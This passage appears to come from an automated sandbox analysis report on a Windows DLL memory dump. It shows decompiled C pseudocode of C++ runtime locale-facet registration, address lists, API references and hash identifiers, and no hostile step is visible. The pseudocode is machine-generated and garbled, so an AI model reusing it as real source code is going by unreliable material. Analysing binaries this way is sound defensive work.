																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E1C6FD3(__eflags, _t722);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e286df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E1C6FD3(__eflags, _t721);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e286dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E1C6FD3(__eflags, _t720);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e286df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E1C6FD3(__eflags, _t719);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e286dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E1C6FD3(__eflags, _t718);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e286dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E1C6FD3(__eflags, _t717);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e286db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

0x6e1cf229
0x6e1cf229
0x6e1cf230
0x6e1cf23a
0x6e1cf23f
0x6e1cf24a
0x6e1cf24e
0x6e1cf251
0x6e1cf256
0x6e1cf25a
0x6e1cf25f
0x6e1cf263
0x6e1cf2a8
0x6e1cf2ab
0x6e1cf2b7
0x6e1cf265
0x6e1cf267
0x6e1cf26d
0x6e1cf273
0x6e1cf27b
0x6e1cf27e
0x6e1cf2bb
0x6e1cf2c9
0x6e1cf2ce
0x6e1cf2d6
0x6e1cf2e0
0x6e1cf2e5
0x6e1cf2f0
0x6e1cf2f4
0x6e1cf2f7
0x6e1cf2fc
0x6e1cf305
0x6e1cf307
0x6e1cf309
0x6e1cf34e
0x6e1cf351
0x6e1cf35d
0x6e1cf30b
0x6e1cf30b
0x6e1cf30d
0x6e1cf313
0x6e1cf319
0x6e1cf321
0x6e1cf324
0x6e1cf361
0x6e1cf36f
0x6e1cf374
0x6e1cf37c
0x6e1cf386
0x6e1cf38b
0x6e1cf396
0x6e1cf39a
0x6e1cf39d
0x6e1cf3a2
0x6e1cf3ab
0x6e1cf3ad
0x6e1cf3af
0x6e1cf3f4
0x6e1cf3f7
0x6e1cf403
0x6e1cf3b1
0x6e1cf3b1
0x6e1cf3b3
0x6e1cf3b9
0x6e1cf3bf
0x6e1cf3c7
0x6e1cf3ca
0x6e1cf407
0x6e1cf415
0x6e1cf41a
0x6e1cf422
0x6e1cf42c
0x6e1cf431
0x6e1cf43c
0x6e1cf440
0x6e1cf443
0x6e1cf448
0x6e1cf451
0x6e1cf453
0x6e1cf455
0x6e1cf49a
0x6e1cf49d
0x6e1cf4a9
0x6e1cf457
0x6e1cf457
0x6e1cf459
0x6e1cf45f
0x6e1cf465
0x6e1cf46d
0x6e1cf470
0x6e1cf4ad
0x6e1cf4bb
0x6e1cf4c0
0x6e1cf4c8
0x6e1cf4d2
0x6e1cf4d7
0x6e1cf4e2
0x6e1cf4e6
0x6e1cf4e9
0x6e1cf4ee
0x6e1cf4f7
0x6e1cf4f9
0x6e1cf4fb
0x6e1cf540
0x6e1cf543
0x6e1cf54f
0x6e1cf4fd
0x6e1cf4fd
0x6e1cf4ff
0x6e1cf505
0x6e1cf50b
0x6e1cf513
0x6e1cf516
0x6e1cf553
0x6e1cf561
0x6e1cf566
0x6e1cf56e
0x6e1cf578
0x6e1cf57d
0x6e1cf588
0x6e1cf58c
0x6e1cf58f
0x6e1cf594
0x6e1cf59d
0x6e1cf59f
0x6e1cf5a1
0x6e1cf5e6
0x6e1cf5e9
0x6e1cf5f5
0x6e1cf5a3
0x6e1cf5a3
0x6e1cf5a5
0x6e1cf5ab
0x6e1cf5b1
0x6e1cf5b9
0x6e1cf5bc
0x6e1cf5f9
0x6e1cf607
0x6e1cf60c
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459
0x6e1cf3cc
0x6e1cf3cc
0x6e1cf3cf
0x6e1cf3d3
0x6e1cf3d7
0x6e1cf3e4
0x6e1cf3ec
0x6e1cf3ee
0x00000000
0x6e1cf3ee
0x6e1cf3b5
0x6e1cf3b5
0x00000000
0x6e1cf3b5
0x6e1cf3b3
0x6e1cf326
0x6e1cf326
0x6e1cf329
0x6e1cf32d
0x6e1cf331
0x6e1cf33e
0x6e1cf346
0x6e1cf348
0x00000000
0x6e1cf348
0x6e1cf30f
0x6e1cf30f
0x00000000
0x6e1cf30f
0x6e1cf30d
0x6e1cf280
0x6e1cf280
0x6e1cf283
0x6e1cf287
0x6e1cf28b
0x6e1cf298
0x6e1cf2a0
0x6e1cf2a2
0x00000000
0x6e1cf2a2
0x6e1cf269
0x6e1cf269
0x00000000
0x6e1cf269
0x6e1cf267

APIs

__EH_prolog3.LIBCMT ref: 6E1CF230
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF23A
int.LIBCPMT ref: 6E1CF251

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1CF274
std::_Facet_Register.LIBCPMT ref: 6E1CF28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF2C9

Strings

lm(n, xrefs: 6E1CF245

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lm(n
API String ID: 438560357-3891014945
Opcode ID: 48af47f9130d42d184005a19c8d68f7c55f6f0e9ac99ff19438a4467299bca55
Instruction ID: 391dadce2ed7032be052bcde2310c524f0e6617f3b744c2aa1226123ef9c8aed
Opcode Fuzzy Hash: 48af47f9130d42d184005a19c8d68f7c55f6f0e9ac99ff19438a4467299bca55
Instruction Fuzzy Hash: 21115C7591051D8BCF01DBD4C854AFEB37AAF64B14F240508D530EB290DF78D989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t902 - 0x14, 0);
				_t861 =  *0x6e286db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1A161C(0x6e286d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E1C66BA(_t902 - 0x14);
					return E6E1E0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E1D0DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t902 - 0x20);
							E6E1E3D74(_t902 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t840, _t861, 0x14);
							E6E1C6653(_t902 - 0x14, 0);
							_t862 =  *0x6e286dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1A161C(0x6e286b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E1C66BA(_t902 - 0x14);
								return E6E1E0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E1D0E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t902 - 0x20);
										E6E1E3D74(_t902 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t637, _t841, _t862, 0x14);
										E6E1C6653(_t902 - 0x14, 0);
										_t863 =  *0x6e286de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1A161C(0x6e286d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E1C66BA(_t902 - 0x14);
											return E6E1E0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E1D0EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t902 - 0x20);
													E6E1E3D74(_t902 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t637, _t842, _t863, 0x14);
													E6E1C6653(_t902 - 0x14, 0);
													_t864 =  *0x6e286db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1A161C(0x6e286d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E1C66BA(_t902 - 0x14);
														return E6E1E0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E1D0F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t902 - 0x20);
																E6E1E3D74(_t902 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t637, _t843, _t864, 0x14);
																E6E1C6653(_t902 - 0x14, 0);
																_t865 =  *0x6e286dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1A161C(0x6e286d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E1C66BA(_t902 - 0x14);
																	return E6E1E0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E1D0F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t902 - 0x20);
																			E6E1E3D74(_t902 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t637, _t844, _t865, 0x14);
																			E6E1C6653(_t902 - 0x14, 0);
																			_t866 =  *0x6e286dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1A161C(0x6e286d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E1C66BA(_t902 - 0x14);
																				return E6E1E0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E1D0FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t902 - 0x20);
																						E6E1E3D74(_t902 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t637, _t845, _t866, 0x14);
																						E6E1C6653(_t902 - 0x14, 0);
																						_t867 =  *0x6e286df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1A161C(0x6e286d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E1C66BA(_t902 - 0x14);
																							return E6E1E0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E1D1057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t902 - 0x20);
																									E6E1E3D74(_t902 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t637, _t846, _t867, 0x14);
																									E6E1C6653(_t902 - 0x14, 0);
																									_t868 =  *0x6e286dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1A161C(0x6e286d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E1C66BA(_t902 - 0x14);
																										return E6E1E0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E1D10BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t902 - 0x20);
																												E6E1E3D74(_t902 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t637, _t847, _t868, 0x14);
																												E6E1C6653(_t902 - 0x14, 0);
																												_t869 =  *0x6e286df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1A161C(0x6e286da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E1C66BA(_t902 - 0x14);
																													return E6E1E0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E1D1127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t902 - 0x20);
																															E6E1E3D74(_t902 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t637, _t848, _t869, 0x14);
																															E6E1C6653(_t902 - 0x14, 0);
																															_t870 =  *0x6e286df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1A161C(0x6e286da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E1C66BA(_t902 - 0x14);
																																return E6E1E0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E1D11AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t902 - 0x20);
																																		E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t637, _t849, _t870, 0x14);
																																		E6E1C6653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e286dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1A161C(0x6e286d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6E1C66BA(_t902 - 0x14);
																																			return E6E1E0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6E1D1230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t902 - 0x20);
																																					E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t637, _t850, _t871, 0x14);
																																					E6E1C6653(_t902 - 0x14, 0);
																																					_t872 =  *0x6e286dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6E1A161C(0x6e286d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
